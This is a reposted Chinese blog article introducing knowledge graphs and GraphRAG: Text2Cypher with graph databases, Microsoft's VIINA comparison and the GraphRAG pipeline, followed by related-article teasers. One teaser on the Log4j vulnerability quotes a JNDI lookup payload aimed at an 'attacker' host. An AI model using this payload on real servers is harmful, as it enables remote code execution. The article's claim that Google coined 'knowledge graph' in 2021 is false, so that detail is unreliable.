LLM如何结合知识图谱进行RAG

news2024/9/27 19:00:35

图片

从RAG到GraphRAG:知识图谱如何提升大模型的检索与推理能力?

©作者|Zane

来源|神州问学

为什么需要知识图谱

在20世纪60年代末,数据库技术开始发展,在70年代数据库技术得到了迅猛的发展,成为了计算机科学的一个重要分支。在80年代时关系型数据模型就处于统治地位,而随着关系型数据库使用范围的不断扩大,也暴露出一些他始终无法解决的问题,其中最主要的是数据建模的一些缺陷和问题,以及在补数据量和多服务器上的如何进行伸缩。同时随着互联网的发展也产生了一些新的变化,而传统的关系型数据库就表现的不是很适应,而为了解决这些传统关系型数据库产生的新型数据库被称为NoSQL数据库。

NoSQL(Not Only SQl),是一类范围非常广发的数据库,他们不遵循关系型数据模型,也不使用SQL作为语言查询,而本次我们将主要关注NoSQL中的图数据库。而作为NoSQL的一种,可以看到在db-engines.com网站中图数据库从2013年开始图数据库的关注度就一直居高不下。

图片

知识图谱这个术语最早是由谷歌在2021年的5月提出,作为器增强搜索的结果,向用户提供更多的上下文信息,知识图谱旨在理解实体之间的关系,并直接提供查询的答案。知识图谱是一种结构化的知识表示方式,它通过实体、关系和属性来描述复杂的知识网络。在知识图谱中,实体代表现实世界中的对象或概念,关系表示实体之间的联系,而属性则描述实体的特征。这种表示方法不仅能够直观地展示知识之间的关联,还能支持高效的知识检索和推理。

结合知识图谱进行RAG

在当前背景下,我们所说的知识图谱往往指的就是图数据库,比如Neo4J,NebulaGraph这种,所以结合知识图谱进行RAG我们也可以理解为结合图数据库进行RAG,而最早提出基于图数据进行RAG的就是NebulaGraph,而结合知识图谱进行RAG的方法也别称为Graph RAG。

在NebulaGraph的文章中,将这种方法称为Text2Cypher,和Text2SQL类似的,是借助LLM生成对应的Cypher语句。在传统的文本查询领域,当一个问题语句发送之后,首先需要意图识别,实体识别,然后再利用LLM模型或者代码将相应的意图和实体构造成查询语句,在结合图数据库中,依然是使用这种方式,只不过是将查询语句变成了Cypher语句或者其他NoSQL语句。

图片

图片

与RAG相比,GraphRAG的提示词不仅包含了查询信息和根据查询信息检索到的相关上下文信息,而且还集成了从领域知识库图谱库中检所到的与查询信息相关的知识图谱信息,在广度深度上更加丰富。因此,GraphRAG不仅进一步的提升了LLM生成答案的准确性和可靠性,突出了是通过知识图谱提高了模型的检索能力提升了LLM处理复杂信息的能力。

在微软今年的实验中,使用新闻文章中的暴力事件信息 (VIINA)数据集,这个数据集中复杂性更高,并且存在不同的意见和部分信息,并且这个数据集中的信息是一个真实测试的案例并且是近期发生的事情,没有被纳入到LLM的预训练中。

在这个实验中,分别基于RAG和GraphRAG进行提问

Query1:“What is Novorossiya?”

图片

Query2: “What has Novorossiya done?”

图片

在问题1中,不论是RAG还是GraphRAG都表现良好,而在问题2中提问的问题包含了一个需要关联的查询,基础的RAG则无法回答,而GraphRAG则从Novorossiya中发现了一个实体,并通过指向原文的链接得到更加优质的答案。

除此之外基础的RAG因为是基于相似度进行查询的,所以很难处理需要汇总整个数据集的信息才能得到的答案,比如“数据中的前五个主题是什么”这种类似的查询,因为基础的RAG基于数据集内的文本内容的向量搜索,所以最终往往很难查询到正确的信息,,但是借助GraphRAG则可以回答这类问题,如在这次的实验中。

Query: “What are the top 5 themes in the data?“

图片

在基础的RAG中发现列举的主题和实际的情况没有太大关系,而GraphRAG的结果中则可以看到5个主要的主题和支持的细节。

知识图谱RAG方案对比

在现在流行的llama-index框架和Langchain框架中,实现知识图谱的检索是通过Text2Cypher的方式。也就是首先通过LLM根据用户提出的问题生成一个Cypher语句,然后再Neo4J数据库或者其他图形数据库中执行这个Cypher语句,最终LLm根据Cypher语句执行的结果进行总结返回。

图片

在微软的GraphRAG框架中则没有使用第三方的图数据库,而是建立在开源的库DataShaper之上,DataShaper是一个数据处理库,允许用户使用明确定义的框架以声明方式表达数据管道、架构和相关资产。

而GrapRAG框架的整体流程则可以划分为一下五个步骤

  1. 编写TextUnit:将输入的文档转换为TextUnits,TextUnit用于提取文本块到图中。

  2. 图提取:这个阶段则分析每个文本单元提取图基础信息:实体、关系和生命,并将结果组合传递到后续阶段

  3. 图增强:在上个阶段获取到的实体和关系图,将在这个阶段扩充,通过社区检测、图嵌入等手段理解图的拓扑记过

  4. 总结:在这个阶段将基于社区数据生成报告以及总结

  5. 文件处理:这个阶段为知识模型创建文档表

  6. 网络可视化:在这个阶段执行一些步骤支持现有图标中的高维向量空间大额网络可视化,此时有两个逻辑图表起作用:实体关系图和文档图

未来的机遇与挑战

GraphRAG未来的发展充满机遇,特别是在需要高准确性和复杂推理的领域中。通过结合知识图谱,GraphRAG能提升生成模型的知识理解、推理能力和信息检索的准确性,尤其在医疗、金融、法律等专业领域提供定制化解决方案。此外,知识图谱的结构化特性使信息更新更快捷,适应快节奏的领域发展。然而,GraphRAG也面临知识图谱构建与维护的复杂性、多模态整合的技术难题、实时性能优化、图谱覆盖范围限制以及隐私和安全等挑战。

资料引用

https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
https://zhuanlan.zhihu.com/p/657195992

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2170727.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring Boot 学习之路 -- 处理 HTTP 请求

前言 最近因为业务需要,被拉去研究后端的项目,代码框架基于 Spring Boot,对我来说完全小白,需要重新学习研究…出于个人习惯,会以 Blog 文章的方式做一些记录,文章内容基本来源于「 Spring Boot 从入门到精…

终于弄明白了!ChatGPT原理大白话解析,看这一篇就够了

我们熟知,ChatGPT能聊天画图,能编程啃论文,那么,这个聊天机器人到底是怎么学会与人类交流的呢? 经过这段时间的琢磨方神倾情板书输出讲解回头翻阅各种资料,也终于明白了个大概,在这尽量给大家用…

大直径海油输油管测径仪的技术特点

关键字:海油输油管测径仪,输油管测径仪,海油管道测径仪,非接触测径仪,大直径测径仪, 大直径海油输油管测径仪的精度是确保海油管道直径测量准确性的关键因素,对于保障油气的顺畅传输与安全稳定具有重要意义。 大直径海油输油管测径仪的精度通常可以达到非常高的水平…

【算法系列-数组】移除元素 (双指针)

【算法系列-数组】移除元素 (双指针) 文章目录 【算法系列-数组】移除元素 (双指针)1. 算法分析🛸2. 删除有序数组中的重复性(LeetCode 26)2.1 解题思路🎯2.2 解题过程🎬2.3 代码举例🌰 3. 移动零(LeetCode 283)3.1 解题思路&…

【java数据结构】泛型

【java数据结构】泛型 一、包装类1.1 基本数据类型对应的包装类1.2 装箱和拆箱 二、泛型2.1 引出泛型2.2 什么是泛型2.3 语法2.3.1 泛型类2.3.2 泛型接口2.3.3 泛型方法 2.4 擦除机制2.5 泛型通配符2.5.1 <?>无限定的通配符2.5.2 <? extends T>上界的通配符2.5.3…

【算法篇】二叉树类(2)(笔记)

目录 一、Leetcode 题目 1. 左叶子之和 &#xff08;1&#xff09;迭代法 &#xff08;2&#xff09;递归法 2. 找树左下角的值 &#xff08;1&#xff09;广度优先算法 &#xff08;2&#xff09;递归法 3. 路径总和 &#xff08;1&#xff09;递归法 &#xff08;2…

移动端自适应/适配方案【详解】(含多种方案对比,推荐 viewport 方案,postcss-px-to-viewport-8-plugin 的使用等)

为什么移动端需要自适应/适配 &#xff1f; 因移动端 屏幕尺寸不同屏幕分辨率不同横竖屏 移动端自适应/适配方案 【必要】设置 meta 标签 <meta name"viewport" content"widthdevice-width, initial-scale1.0, maximum-scale1.0, user-scalable0">…

N930X音乐芯片,声光报警器语音方案:“您已进入警戒区域”

随着科技的飞速发展&#xff0c;城市规模不断扩大&#xff0c;人口密集度显著增加&#xff0c;各类安全隐患也随之而来。从商业楼宇到居民小区&#xff0c;从工业园区到交通枢纽&#xff0c;每一个角落都需要高效、可靠的安防系统来守护人们的生命财产安全。 声光报警器&#…

【ADC】SAR 型 ADC 和 ΔΣ ADC 的噪声源以及输入信号驱动和电压基准驱动电路

本文学习于TI 高精度实验室课程&#xff0c;简要介绍 SAR 型 ADC 和 ΔΣ ADC 的输入信号驱动和电压基准驱动电路&#xff0c;并介绍 SAR 和 Delta-Sigma 转换器的内在和外在噪声源。 文章目录 一、ADC 的外部噪声1.1 50/60 Hz 工频干扰1.2 混叠与抗混叠滤波器1.3 射频&#xf…

博主回归!数据结构篇启动

目录 1>>闲话 2>>数据结构前言 3>>复杂度的概念 4>>时间复杂度 5>>大O渐进表示法 6>>总结 1>>闲话 家人们好久不见&#xff0c;小编军训终于是结束了&#xff0c;大一事情太多了&#xff0c;这几天没时间健身&#xff0c;没时间…

WT2605C蓝牙语音芯片智能对话模型 人机互动 让机械设备更智能

随着人工智能技术的飞速发展&#xff0c;AI语音芯片在机械设备领域的应用日益广泛。WT2605C作为一款集成了在线TTS&#xff08;Text-To-Speech&#xff0c;文本到语音&#xff09;功能的蓝牙语音芯片&#xff0c;凭借其卓越的性能和广泛的应用前景&#xff0c;为机械设备产品带…

Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

漏洞描述&#xff1a; 当用户输入信息时&#xff0c;应用程序中的log4j 2组件会将信息记录到日志中 假如日志中包含有语句${jndi:ldap:attacker:1099/exp}&#xff0c;log4j就会去解析该信息&#xff0c;通过jndi的lookup() 方法去解析该url&#xff1a;ldap:attacker:1099/e…

vue-实现rtmp直播流

1、安装vue-video-player与videojs-flash npm install vue-video-player -S npm install videojs-flash --save 2、在main.js中引入 3、组件中使用 这样就能实现rtmp直播流在浏览器中播放&#xff0c;但有以下几点切记&#xff0c;不要入坑 1.安装vue-video-player插件一定…

Java.反射

目录 1.获取class 的三种方式 2.利用反射获取构造方法 3.利用反射获取成员变量 4.利用反射获取成员方法 1.获取class 的三种方式 全类名怎么找? 全类名报名&#xff0b;类名 package MyReflect;public class Student {private String id;private String name;private int…

LeetCode Hot100 C++ 哈希 1.两数之和

LeetCode Hot100 C 1.两数之和 给定一个整数数组 nums 和一个整数目标值 target&#xff0c;请你在该数组中找出 和为目标值 target 的那 两个整数&#xff0c;并返回它们的数组下标。 你可以假设每种输入只会对应一个答案&#xff0c;并且你不能使用两次相同的元素。 你可以按…

HTML5实现唐朝服饰网站模板源码

文章目录 1.设计来源1.1 网站首页-界面效果1.2 唐装演变-界面效果1.3 唐装配色-界面效果1.4 唐装花纹-界面效果1.5 唐装文化-界面效果 2.效果和源码2.1 动态效果2.2 源代码 源码下载万套模板&#xff0c;程序开发&#xff0c;在线开发&#xff0c;在线沟通 作者&#xff1a;xcL…

【DP解密多重背包问题】:优化策略与实现

文章目录 什么是多重背包问题&#xff1f;多重背包问题的数学模型 例题多重背包问题Ⅰ多重背包问题Ⅱ 总结 什么是多重背包问题&#xff1f; 多重背包问题是一个经典的组合优化问题。与标准背包问题不同&#xff0c;在多重背包问题中&#xff0c;每种物品可以选择多个&#xf…

数据链路层之以太网

目录 ​前言 什么是以太网&#xff1f; 以太网帧格式 6位源地址和目的地址 什么是MAC地址&#xff1f; MAC地址和IP地址的区别 2位类型 ARP协议 ARP协议的作用 ARP协议的工作流程 数据长度 MTU对IP协议的影响 CRC校验和 前言 在前面&#xff0c;我们已经讲了在TC…

安卓好软-----手机屏幕自动点击工具 无需root权限

工具可以设置后自动点击屏幕。可以用于一些操作。例如自动刷视频等等哦 工具介绍 一款可以帮你实现自动操作的软件。软件中你可以根据实际需要设置点击位置&#xff0c;可以是屏幕上的特定位置&#xff0c;也可以是按钮或控件。功能非常强大&#xff0c;但是操作非常简单&…

7个不为人知的实用软件推荐

今天再给大家分享7款不常被提及但又很好用的小众宝藏软件&#xff0c;强大实用&#xff0c;值得被更多的人看见&#xff01; 1.向日葵——电脑远程控制 下载链接&#xff1a;https://sunlogin.oray.com/ 对于很多电脑小白来说&#xff0c;其实很多软件安装、电脑调试之类的操…